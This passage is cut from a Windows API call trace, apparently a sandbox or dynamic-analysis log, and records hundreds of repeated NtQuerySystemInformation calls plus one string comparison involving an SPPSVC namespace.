ResultLength=0x0) [0303.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe130, Length=0x50, ResultLength=0x0) [0303.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe130, Length=0x50, ResultLength=0x0) [0303.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe130, Length=0x50, ResultLength=0x0) [0303.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe020, Length=0x50, ResultLength=0x0) [0303.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe020, Length=0x50, ResultLength=0x0) [0303.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe020, Length=0x50, ResultLength=0x0) [0303.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe020, Length=0x50, ResultLength=0x0) [0303.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf50, Length=0x38, ResultLength=0x0) [0303.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd80, Length=0x28, ResultLength=0x0) [0303.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd80, Length=0x28, ResultLength=0x0) [0303.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd80, Length=0x28, ResultLength=0x0) [0303.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd80, Length=0x28, ResultLength=0x0) [0303.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffddf0, Length=0x28, ResultLength=0x0) [0303.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf50, Length=0x38, ResultLength=0x0) [0303.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffde70, Length=0x28, ResultLength=0x0) [0303.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffde70, Length=0x28, ResultLength=0x0) [0303.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd10, Length=0x20, ResultLength=0x0) [0303.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc90, Length=0x20, ResultLength=0x0) [0303.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc90, Length=0x20, ResultLength=0x0) [0303.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc90, Length=0x20, ResultLength=0x0) [0303.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf50, Length=0x38, ResultLength=0x0) [0303.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf50, Length=0x38, ResultLength=0x0) [0303.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffddd0, Length=0x20, ResultLength=0x0) [0303.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd60, Length=0x20, ResultLength=0x0) [0303.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd60, Length=0x20, ResultLength=0x0) [0303.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe390, Length=0x50, ResultLength=0x0) [0303.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe390, Length=0x50, ResultLength=0x0) [0303.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe390, Length=0x50, ResultLength=0x0) [0303.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe280, Length=0x50, ResultLength=0x0) [0303.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe280, Length=0x50, ResultLength=0x0) [0303.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe280, Length=0x50, ResultLength=0x0) [0303.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe280, Length=0x50, ResultLength=0x0) [0303.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe1b0, Length=0x38, ResultLength=0x0) [0303.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdfe0, Length=0x28, ResultLength=0x0) [0303.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdfe0, Length=0x28, ResultLength=0x0) [0303.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdfe0, Length=0x28, ResultLength=0x0) [0303.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe050, Length=0x28, ResultLength=0x0) [0303.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe1b0, Length=0x38, ResultLength=0x0) [0303.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe0d0, Length=0x28, ResultLength=0x0) [0303.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe0d0, Length=0x28, ResultLength=0x0) [0303.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe1b0, Length=0x38, ResultLength=0x0) [0303.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe030, Length=0x20, ResultLength=0x0) [0303.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdfb0, Length=0x20, ResultLength=0x0) [0303.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdfb0, Length=0x20, ResultLength=0x0) [0303.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdfb0, Length=0x20, ResultLength=0x0) [0303.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe1b0, Length=0x38, ResultLength=0x0) [0303.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe030, Length=0x20, ResultLength=0x0) [0303.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdfc0, Length=0x20, ResultLength=0x0) [0303.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdfc0, Length=0x20, ResultLength=0x0) [0303.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe390, Length=0x50, ResultLength=0x0) [0303.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe390, Length=0x50, ResultLength=0x0) [0303.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe390, Length=0x50, ResultLength=0x0) [0303.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe280, Length=0x50, ResultLength=0x0) [0303.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe280, Length=0x50, ResultLength=0x0) [0303.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe280, Length=0x50, ResultLength=0x0) [0303.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe280, Length=0x50, ResultLength=0x0) [0303.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe1b0, Length=0x38, ResultLength=0x0) [0303.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdfe0, Length=0x28, ResultLength=0x0) [0303.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdfe0, Length=0x28, ResultLength=0x0) [0303.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdfe0, Length=0x28, ResultLength=0x0) [0303.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe050, Length=0x28, ResultLength=0x0) [0303.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe1b0, Length=0x38, ResultLength=0x0) [0303.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe0d0, Length=0x28, ResultLength=0x0) [0303.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe0d0, Length=0x28, ResultLength=0x0) [0303.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe1b0, Length=0x38, ResultLength=0x0) [0303.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe030, Length=0x20, ResultLength=0x0) [0303.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdfb0, Length=0x20, ResultLength=0x0) [0303.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdfb0, Length=0x20, ResultLength=0x0) [0303.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdfb0, Length=0x20, ResultLength=0x0) [0303.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe1b0, Length=0x38, ResultLength=0x0) [0303.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe030, Length=0x20, ResultLength=0x0) [0303.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdfc0, Length=0x20, ResultLength=0x0) [0303.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdfc0, Length=0x20, ResultLength=0x0) [0303.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe440, Length=0x50, ResultLength=0x0) [0303.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe3c0, Length=0x28, ResultLength=0x0) [0303.714] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0303.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe440, Length=0x50, ResultLength=0x0) [0303.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe440, Length=0x50, ResultLength=0x0) [0303.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe440, Length=0x50, ResultLength=0x0) [0303.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe370, Length=0x38, ResultLength=0x0) [0303.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe1a0, Length=0x28, ResultLength=0x0) [0303.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe1a0, Length=0x28, ResultLength=0x0) [0303.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe1a0, Length=0x28, ResultLength=0x0) [0303.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe210, Length=0x28, ResultLength=0x0) [0303.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe370, Length=0x38, ResultLength=0x0) [0303.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe290, Length=0x28, ResultLength=0x0) [0303.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe290, Length=0x28, ResultLength=0x0) [0303.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe370, Length=0x38, ResultLength=0x0) [0303.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe1f0, Length=0x20, ResultLength=0x0) [0303.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe170, Length=0x20, ResultLength=0x0) [0303.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe170, Length=0x20, 